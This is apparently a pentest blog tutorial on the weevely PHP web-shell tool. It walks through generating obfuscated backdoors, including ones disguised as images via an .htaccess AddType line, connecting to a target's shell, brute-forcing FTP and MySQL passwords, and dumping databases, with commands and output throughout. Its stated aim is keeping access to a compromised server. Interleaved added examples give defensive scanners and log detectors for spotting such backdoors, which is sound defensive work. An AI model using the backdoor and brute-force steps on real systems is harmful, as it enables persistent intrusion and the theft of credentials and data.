If you need a quick way to generate a PHP backdoor for a compromised server you want to come back to later, then weevely is your application. I was pleasantly surprised when I started playing around with weevely in more detail, as it provides a ton of built-in functionality and does a lot more than I initially thought it did. The weevely application is built using Python, and its current version on Backtrack 5 R3 is weevely v0.7. The weevely.py Python script is located in the /pentest/backdoors/web/weevely directory, and some of its uses are described in more detail below.
Generate weevely Backdoor Files:
There are three types of files that weevely can generate as backdoors. The PHP file type is likely to have the most success, because the .htaccess file type and the image file type both require the directory where they are placed to allow .htaccess overrides (AllowOverride). If you are able to find a directory that allows overrides, then the image backdoor files are awesome because they will still display in a browser and could be harder for others to find. Below we show three examples, generating one of each weevely file type backdoor. In the end all three contain very similar contents, but as noted above the PHP is better hidden in the .htaccess file type and the image file type.
Generate PHP File Backdoor Using Weevely:
- root@bt:/pentest/backdoors/web/weevely# python weevely.py generate password
- ________ __
- | | | |-----.----.-.--.----' |--.--.
- | | | | -__| -__| | | -__| | | |
- |________|_____|____|___/|____|__|___ | v0.7
- |_____|
- Stealth tiny web shell
- [generate.php] Backdoor file 'weevely.php' created with password 'password'.
- root@bt:/pentest/backdoors/web/weevely#
You should also check out the contents of the files that are created. It should also be noted that just because the generated file is called weevely.php doesn’t mean it cannot be renamed to something more off the radar for a PHP site, such as include.php.
Generate Image File Backdoor Using Weevely:
- root@bt:/pentest/backdoors/web/weevely# less generated-img/.htaccess
- AddType application/x-httpd-php .gif
- root@bt:/pentest/backdoors/web/weevely#
When an image file type backdoor is created, you have to place not only the image on the remote server but also the .htaccess file that is generated with it. If a .htaccess file already exists, you could simply add the contents of the generated .htaccess file to the real .htaccess file on the server. The line that would need to be added is “AddType application/x-httpd-php .gif”, which would obviously change depending on the image file type itself. That line in a .htaccess file tells the web server to process .gif files as PHP files.
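Both placement tricks described so far, a renamed PHP file such as include.php and an image that Apache runs as PHP because of an AddType line in .htaccess, leave marks on the file system that the server's owner can look for. The scanner below is an added example for that defender-side check; it is not part of weevely and not code from the original article. It walks a document root and reports .htaccess files that hand non-PHP extensions to the PHP handler, files whose extension is not a PHP extension but whose content carries a PHP open tag, and PHP files using the execution and decoding functions common in obfuscated shells. The default path /var/www, the 512 KiB read limit and the keyword list are my own choices.

```python
"""Triage scanner for PHP-handler remaps and disguised PHP files (added example)."""
import os
import re
import sys

# Directives that hand a file to the PHP interpreter. Any handler token that
# contains "php" is treated as PHP (application/x-httpd-php, php5-script, ...).
HANDLER_RE = re.compile(r'^(AddType|AddHandler|SetHandler)\s+(\S*php\S*)\s*(.*)$', re.IGNORECASE)
PHP_EXTENSIONS = {'.php', '.phtml', '.php3', '.php4', '.php5', '.phps'}
PHP_TAG_RE = re.compile(rb'<\?php|<\?=|<script\s+language\s*=\s*["\']?php', re.IGNORECASE)
# Constructs typical of obfuscated shells. Legitimate code uses some of these
# too, so hits are reported for a human to review, not treated as a verdict.
SUSPICIOUS_RE = re.compile(
    rb'\b(eval|assert|create_function|base64_decode|gzinflate|str_rot13|'
    rb'passthru|shell_exec|system|popen|proc_open)\s*\(', re.IGNORECASE)


def scan_htaccess(text):
    """Return the non-PHP extensions an .htaccess body hands to the PHP handler.

    A SetHandler line applies to every file in its scope and is reported as '*'.
    """
    remapped = []
    for line in text.splitlines():
        line = line.split('#', 1)[0].strip()      # drop comments
        m = HANDLER_RE.match(line)
        if not m:
            continue
        if m.group(1).lower() == 'sethandler':
            remapped.append('*')
            continue
        for ext in m.group(3).split():
            if ext.lower() not in PHP_EXTENSIONS:
                remapped.append(ext)
    return remapped


def classify_file(path, data):
    """Classify one file's content; the caller decides what to do with it."""
    ext = os.path.splitext(path)[1].lower()
    has_php = bool(PHP_TAG_RE.search(data))
    hits = sorted({m.group(1).decode().lower() for m in SUSPICIOUS_RE.finditer(data)})
    return {
        'path': path,
        'php_tag': has_php,
        # PHP code inside a file that is not named like PHP: the image trick
        'disguised': has_php and ext not in PHP_EXTENSIONS,
        'suspicious': hits if has_php else [],
    }


def scan_tree(root):
    """Walk a document root and collect findings worth a human look."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                with open(full, 'rb') as fh:
                    data = fh.read(512 * 1024)   # first 512 KiB is enough for triage
            except OSError:
                continue
            if name == '.htaccess':
                remapped = scan_htaccess(data.decode('utf-8', 'replace'))
                if remapped:
                    findings.append({'path': full, 'php_handler_for': remapped})
                continue
            info = classify_file(full, data)
            if info['disguised'] or info['suspicious']:
                findings.append(info)
    return findings


if __name__ == '__main__':
    for finding in scan_tree(sys.argv[1] if len(sys.argv) > 1 else '/var/www'):
        print(finding)
```

Run it as `python scanner.py /var/www` and review every line it prints; the keyword hits are a triage aid, not proof. The .htaccess finding is the one that matters most here: if the directory's Apache configuration says AllowOverride None, the AddType trick does nothing at all, so the cleanest fix is to disable overrides wherever the site does not need them.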
Generate .htaccess File Backdoor Using Weevely:
- root@bt:/pentest/backdoors/web/weevely# python weevely.py generate.htaccess password
- ________ __
- | | | |-----.----.-.--.----' |--.--.
- | | | | -__| -__| | | -__| | | |
- |________|_____|____|___/|____|__|___ | v0.7
- |_____|
- Stealth tiny web shell
- [generate.htaccess] Backdoor file '.htaccess' created with password 'password'.
- root@bt:/pentest/backdoors/web/weevely#
Once you have generated the file you want to place on the remote server, you need to transfer it to the server, which can be done using whatever method is available on the compromised server, such as SCP, FTP, TFTP, etc. Once the file exists in a directory that is served by the remote web server, you can make a connection to a weevely shell as shown in the example below. You can also issue commands remotely to the server once the weevely backdoor file is in place, which is also shown in an example below. In all of the examples below our target machine is located at 192.168.1.77 and our machine is located at 192.168.1.88.
Connect To Weevely Backdoor Shell On Backtrack:
- root@bt:/pentest/backdoors/web/weevely# python weevely.py http://192.168.1.77/weevely.php password
- ________ __
- | | | |-----.----.-.--.----' |--.--.
- | | | | -__| -__| | | -__| | | |
- |________|_____|____|___/|____|__|___ | v0.7
- |_____|
- Stealth tiny web shell
- [+] Starting terminal, shell probe may take a while
- [+] List modules with <tab> and show help with :show [module name]
- www-data@zotac:/var/www$
- www-data@zotac:/var/www$ :net.ifaces
- eth0: 192.168.1.77/24
- lo: 127.0.0.1/8
- www-data@zotac:/var/www$
Notice we are now connected to the remote server via the weevely backdoor. The weevely shell is pretty slick and offers lots of prebuilt modules that make gathering information super easy. Once we connected in the above example we verified we were on the remote server using the net.ifaces module available from the weevely shell. The net.ifaces module provides a clean list of active interfaces and their IP addresses on the remote server. If there was an issue connecting to the weevely shell the response from the server would look like the below example.
Failed Connection To Weevely Backdoor:
- root@bt:/pentest/backdoors/web/weevely# python weevely.py http://192.168.1.77/background.php password
- ________ __
- | | | |-----.----.-.--.----' |--.--.
- | | | | -__| -__| | | -__| | | |
- |________|_____|____|___/|____|__|___ | v0.7
- |_____|
- Stealth tiny web shell
- [+] Starting terminal, shell probe may take a while
- [!] [shell.php] PHP interpreter initialization failed
- [!] [shell.php] PHP interpreter initialization failed
- [!] No remote backdoor found. Check URL and password.
- root@bt:/pentest/backdoors/web/weevely#
If you want to send a couple of commands without actually setting up an established connection with the compromised server, you can do so using the syntax from the example below. Sending this type of command to the remote server to interact with the weevely backdoor lets you issue not only Linux commands but also weevely modules, so in the example below you would just switch “/sbin/ifconfig eth0” with something like “:net.ifaces”. It should also be noted that to disconnect from a weevely backdoor you have to use ctrl-c.
Issue Single Command To Remote Weevely Backdoor:
- root@bt:/pentest/backdoors/web/weevely# python weevely.py http://192.168.1.77/.htaccess password "/sbin/ifconfig eth0"
- ________ __
- | | | |-----.----.-.--.----' |--.--.
- | | | | -__| -__| | | -__| | | |
- |________|_____|____|___/|____|__|___ | v0.7
- |_____|
- Stealth tiny web shell
- eth0 Link encap:Ethernet HWaddr 00:22:2e:40:33:b0
- inet addr:192.168.1.77 Bcast:192.168.1.255 Mask:255.255.255.0
- inet6 addr: fe80::201:2eee:fe33:1330/64 Scope:Link
- UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
- RX packets:148287 errors:0 dropped:4 overruns:0 frame:0
- TX packets:11643 errors:0 dropped:0 overruns:0 carrier:0
- collisions:0 txqueuelen:1000
- RX bytes:12456067 (12.4 MB) TX bytes:2208146 (2.2 MB)
- Interrupt:43 Base address:0xc000
- root@bt:/pentest/backdoors/web/weevely#
Now that you are familiar with generating the weevely backdoor files and making a basic connection to a remote weevely shell, let's dig deeper into the capabilities of the weevely shell and the growing list of modules that are available. The list below gives a brief description of each module available in weevely v0.7 on Backtrack Linux.
weevely Examples Using Built In Modules:
- [audit]
- [audit.user_files] Enumerate common restricted files for every system user
- Usage :audit.user_files [auto] [list] [path]
- [audit.user_web_files] First crawl web site, then enumerate files searching w/r/x permissions
- Usage :audit.user_web_files [deep]
- [audit.etc_passwd] Enumerate users in /etc/passwd content
- Usage :audit.etc_passwd [filter]
- [backdoor]
- [backdoor.tcp] Spawn shell on TCP port
- Usage :backdoor.tcp
- [backdoor.reverse_tcp] Send reverse TCP shell
- Usage :backdoor.reverse_tcp
- [bruteforce]
- [bruteforce.sql_users] Bruteforce SQL password of every system users using local wordlist
- Usage :bruteforce.sql_users [host]
- [bruteforce.ftp] Bruteforce single ftp user using local wordlist
- Usage :bruteforce.ftp [sline] [host] [port]
- [bruteforce.sql] Bruteforce single SQL user using local wordlist
- Usage :bruteforce.sql [sline] [host]
- [bruteforce.ftp_users] Bruteforce FTP password of every system users using a local wordlist
- Usage :bruteforce.ftp_users [host] [port]
- [file]
- [file.download] Download binary/ascii files from target
- Usage :file.download
- [file.check] Check remote files type, md5 and permission
- Usage :file.check
- [file.enum] Enumerate remote paths specified by wordlist
- Usage :file.enum [printall]
- [file.rm] Remove remote file and directory
- Usage :file.rm [recursive]
- [file.upload] Upload a file to the target filesystem
- Usage :file.upload [chunksize]
- [file.read] Read file from remote filesystem
- Usage :file.read
- [find]
- [find.suidsgid] Find files with suid and sgid flags
- Usage :find.suidsgid [type] [rpath]
- [find.perms] Find files by permissions
- Usage :find.perms [qty] [type] [perm] [rpath]
- [find.name] Find files with matching name
- Usage :find.name [match]
- [find.webdir] Find a writable directory and corresponding URL
- Usage :find.webdir [rpath]
- [generate]
- [generate.php] Generate obfuscated PHP backdoor
- Usage :generate.php [path]
- [generate.img] Backdoor existing image and create htaccess (needs remote AllowOverride)
- Usage :generate.img [outdir]
- [generate.htaccess] Create backdoor in .htaccess file (needs remote AllowOverride)
- Usage :generate.htaccess [path]
- [net]
- [net.ifaces] Print network interfaces IP/mask
- Usage :net.ifaces
- [net.php_proxy] Install PHP proxy to target
- Usage :net.php_proxy [rpath] [finddir]
- [net.proxy] Install and run real proxy through target
- Usage :net.proxy [rpath] [rurl] [finddir] [lport]
- [net.scan] Scan network for open ports
- Usage :net.scan [onlyknownports] [portsperreq]
- [shell]
- [shell.php] PHP command shell
- Usage :shell.php [mode] [proxy]
- [shell.sh] System shell
- Usage :shell.sh [stderr]
- [sql]
- [sql.console] Start SQL console
- Usage :sql.console [host]
- [sql.query] Execute SQL query
- Usage :sql.query [host]
- [sql.summary] Get SQL summary of database or single tables
- Usage :sql.summary [host]
- [sql.dump] Get SQL mysqldump-like database dump
- Usage :sql.dump [table] [host] [lfile]
- [system]
- [system.info] Collect system informations
- Usage :system.info [info]
Now for numerous examples that are all briefly explained by their titles. This should not be considered a complete list, as weevely has lots of capabilities; I selected some of the modules that I have found useful when using the weevely.py Python script. All of the examples below assume you are already connected to a weevely backdoor.
weevely :system.info Module: Remote System Information
- www-data@zotac:/var/www$ :system.info
- whoami: www-data
- hostname: zotac
- basedir: /var/www
- uname: Linux zotac 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux
- os: Linux
- document_root: /var/www
- safe_mode: 0
- script: /weevely.php
- client_ip: 192.168.1.88
- max_execution_time: 30
- php_self: /weevely.php
- www-data@zotac:/var/www$
The system.info module provides you with an overview of the remote system including the user you are connected as, the web server root directory, the hostname, the weevely backdoor script name, and more.
weevely :find.webdir Module: Locate Writable Remote Web Server Directories
- www-data@zotac:/var/www$ :find.webdir
- [find.webdir] Writable web folder: '/var/www//weev/' -> 'http://192.168.1.77//weev/'
- True
- www-data@zotac:/var/www$
The find.webdir module will scan the remote web server directory and let you know of any directories that are writable.
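find.webdir answers a question the server's owner should already know the answer to: which directories under the document root can the web server account write to, and does PHP still execute there? The audit below is an added example that asks that question from the defender's side; it is not weevely's module and not code from the original article. It assumes a Linux host where the web server runs as a dedicated account (www-data by default, an assumption you can override), checks the classic owner/group/other bits against that account, and notes whether an .htaccess in the directory switches the mod_php engine off.

```python
"""Audit a document root for directories writable by the web account (added example)."""
import grp
import os
import pwd
import stat
import sys

# Account the web server (and therefore a PHP backdoor) runs as. Assumption;
# adjust for your distribution.
WEB_USER = 'www-data'


def ids_for_user(username):
    """uid and the full set of gids for the web server account."""
    pw = pwd.getpwnam(username)
    gids = {pw.pw_gid} | {g.gr_gid for g in grp.getgrall() if username in g.gr_mem}
    return pw.pw_uid, gids


def mode_allows_write(st_mode, st_uid, st_gid, uid, gids):
    """Classic Unix permission check: owner bits win, then group, then other.

    POSIX ACLs are not consulted; run getfacl on anything this marks as safe
    if the file system uses them.
    """
    if st_uid == uid:
        return bool(st_mode & stat.S_IWUSR)
    if st_gid in gids:
        return bool(st_mode & stat.S_IWGRP)
    return bool(st_mode & stat.S_IWOTH)


def htaccess_disables_php(text):
    """True if an .htaccess body contains 'php_flag engine off' (mod_php)."""
    for line in text.splitlines():
        parts = line.split('#', 1)[0].split()
        if (len(parts) == 3 and parts[0].lower() == 'php_flag'
                and parts[1].lower() == 'engine' and parts[2].lower() == 'off'):
            return True
    return False


def audit(root, web_user=WEB_USER):
    """Directories under root the web account can write to, and whether PHP runs there."""
    uid, gids = ids_for_user(web_user)
    findings = []
    for dirpath, _dirs, _files in os.walk(root):
        st = os.lstat(dirpath)
        if not mode_allows_write(st.st_mode, st.st_uid, st.st_gid, uid, gids):
            continue
        try:
            with open(os.path.join(dirpath, '.htaccess')) as fh:
                engine_off = htaccess_disables_php(fh.read())
        except OSError:
            engine_off = False
        findings.append({
            'dir': dirpath,
            'world_writable': bool(st.st_mode & stat.S_IWOTH),
            # writable AND still executing PHP is the combination find.webdir hunts for
            'php_engine_off': engine_off,
        })
    return findings


if __name__ == '__main__':
    root = sys.argv[1] if len(sys.argv) > 1 else '/var/www'
    for f in audit(root):
        verdict = 'ok (engine off)' if f['php_engine_off'] else 'REVIEW'
        print(f"{verdict:16} {f['dir']}  world_writable={f['world_writable']}")
```

Every directory printed as REVIEW is a place where an uploaded weevely.php would both land and run. Upload and cache directories usually have to stay writable, so the fix there is to stop PHP executing in them; `php_flag engine off` in .htaccess works if overrides are allowed, and `php_admin_flag engine off` inside the directory's block in the main Apache configuration is the stronger form because no .htaccess can turn it back on.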
weevely :bruteforce.ftp Module: Bruteforce FTP User Password
- www-data@zotac:/var/www$ :bruteforce.ftp SOMEUSER /root/wordlists/weevword
- [bruteforce.ftp] Using wordlist of 9 words
- [bruteforce.ftp] FOUND! (SOMEUSER:PASSWORD)
- www-data@zotac:/var/www$
The bruteforce.ftp weevely module will attempt to bruteforce an FTP user's password. Depending on how large the wordlist is or how quickly the password is located this can take quite a while, so be patient; I am not sure if any status messages are printed during the process, as I set this up just as a test for this article.
weevely :bruteforce.sql Module: Bruteforce MySQL User Password
- www-data@zotac:/var/www$ :bruteforce.sql mysql root /root/wordlists/weevword
- [bruteforce.sql] Using wordlist of 999 words
- [bruteforce.sql] FOUND! (root:PASSWORD)
- www-data@zotac:/var/www$
The bruteforce.sql module available from the weevely shell will attempt to bruteforce a MySQL user's password using a wordlist located on your local server. Once you have compromised a MySQL account you can then proceed to use some of the other available weevely SQL modules, as shown below.
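One thing worth noticing about both bruteforce modules is where the guesses come from: they run inside the backdoor on the compromised web server, so the FTP and MySQL failures arrive from that server's own address, often 127.0.0.1 or localhost, which is exactly the source many threshold rules whitelist. The detector below is an added example of the log-side check, not part of weevely and not code from the original article. It counts failed logins per (service, source, user) in a sliding window and flags bursts, marking whether the source is local. The sample log lines are constructed to resemble vsftpd and MySQL error-log entries; they are not real captures, and the regexes should be adjusted to the formats your own daemons write.

```python
"""Windowed failed-login burst detector for FTP and MySQL logs (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime

WINDOW = 60        # seconds
THRESHOLD = 5      # failures inside WINDOW that raise an alert

# Constructed sample in vsftpd style:
#   'Fri Feb 17 10:34:20 2012 [pid 2101] [SOMEUSER] FAIL LOGIN: Client "127.0.0.1"'
VSFTPD_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] \[(?P<user>[^\]]+)\] '
    r'FAIL LOGIN: Client "(?P<src>[^"]+)"')
# Constructed sample in MySQL error-log style:
#   "120217 10:40:01 [Warning] Access denied for user 'root'@'localhost' (using password: YES)"
MYSQL_RE = re.compile(
    r"^(?P<ts>\d{6} +\d{1,2}:\d\d:\d\d) \[Warning\] Access denied for user "
    r"'(?P<user>[^']*)'@'(?P<src>[^']+)'")

LOCAL_SOURCES = {'127.0.0.1', 'localhost', '::1'}


def parse_line(line):
    """Return (service, timestamp, src, user) for a failed-login line, else None."""
    m = VSFTPD_RE.match(line)
    if m:
        ts = datetime.strptime(m.group('ts'), '%a %b %d %H:%M:%S %Y')
        return ('ftp', ts, m.group('src'), m.group('user'))
    m = MYSQL_RE.match(line)
    if m:
        ts = datetime.strptime(m.group('ts'), '%y%m%d %H:%M:%S')
        return ('mysql', ts, m.group('src'), m.group('user'))
    return None


def detect(lines, window=WINDOW, threshold=THRESHOLD):
    """Sliding-window count per (service, src, user); one alert per key."""
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        service, ts, src, user = parsed
        key = (service, src, user)
        q = recent[key]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window:   # expire old failures
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({
                'service': service, 'src': src, 'user': user,
                'failures': len(q), 'first': q[0], 'last': ts,
                # guesses from the box itself point at a foothold on the box
                'local_source': src in LOCAL_SOURCES,
            })
    return alerts


# Constructed sample log: five FTP failures in four seconds, then three MySQL
# failures (below the default threshold) and one unrelated line.
SAMPLE_LOG = [
    'Fri Feb 17 10:34:20 2012 [pid 2101] [SOMEUSER] FAIL LOGIN: Client "127.0.0.1"',
    'Fri Feb 17 10:34:21 2012 [pid 2103] [SOMEUSER] FAIL LOGIN: Client "127.0.0.1"',
    'Fri Feb 17 10:34:21 2012 [pid 2105] [SOMEUSER] FAIL LOGIN: Client "127.0.0.1"',
    'Fri Feb 17 10:34:22 2012 [pid 2107] [SOMEUSER] FAIL LOGIN: Client "127.0.0.1"',
    'Fri Feb 17 10:34:23 2012 [pid 2109] [SOMEUSER] FAIL LOGIN: Client "127.0.0.1"',
    'Fri Feb 17 10:34:24 2012 [pid 2111] [SOMEUSER] OK LOGIN: Client "127.0.0.1"',
    "120217 10:40:01 [Warning] Access denied for user 'root'@'localhost' (using password: YES)",
    "120217 10:40:02 [Warning] Access denied for user 'root'@'localhost' (using password: YES)",
    "120217 10:40:03 [Warning] Access denied for user 'root'@'localhost' (using password: YES)",
    "120217 10:45:00 [Note] /usr/sbin/mysqld: ready for connections.",
]

if __name__ == '__main__':
    for a in detect(SAMPLE_LOG):
        where = 'LOCAL' if a['local_source'] else a['src']
        print(f"{a['service']}: {a['failures']} failures for {a['user']} from {where} "
              f"between {a['first']} and {a['last']}")
```

With the sample data only the FTP burst crosses the default threshold; lowering it to 3 also raises the MySQL one. The local_source flag is the part to act on: a burst from 127.0.0.1 against a service on the same host cannot be explained by an outside scanner and is a strong hint that something is already running on the box, which is the situation the weevely modules above create.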
weevely :sql.query Module: Issue Single SQL Commands To MySQL
- www-data@zotac:/var/www$ :sql.query mysql root PASSWORD-HERE "show databases" localhost
- information_schema
- mysql
- snorby
- www-data@zotac:/var/www$
Using the sql.query module available in weevely we are able to issue single queries to MySQL without connecting to the weevely SQL shell which we show in the example below.
weevely :sql.console Module: Connect To weevely SQL Console On Remote Server
- www-data@zotac:/var/www$ :sql.console mysql root PASSWORD-HERE localhost
- [sql.console] No saved state, commands like 'USE database' are ineffective. Press Ctrl-C to quit.
- root@localhost SQL> show databases;
- information_schema
- mysql
- snorby
- root@localhost SQL>
Notice how the prompt changes above: after we have made a successful connection to MySQL we are in the weevely SQL shell, with direct access to the remote server's MySQL database. To get out of the weevely SQL shell use ctrl-c.
weevely :sql.dump Module: Dump MySQL Database & Save Dump Locally
- www-data@zotac:/var/www$ :sql.dump mysql root PASSWORD mysql
- [sql.dump] Saving 'root:PASSWORD@127.0.0.1-mysql' dump in 'root:PASSWORD@127.0.0.1-mysql.txt'
- www-data@zotac:/var/www$
This is one of my favorites, as it makes getting a dump of the database really easy. The MySQL dump file will be located in the directory from which you initially launched the weevely backdoor connection, and it will be named with the user/pass and IP address of the MySQL server where the dump was created.
This is only some of the capabilities available with weevely but should provide a great overview for someone needing to use weevely to setup a backdoor they can access later on a compromised server.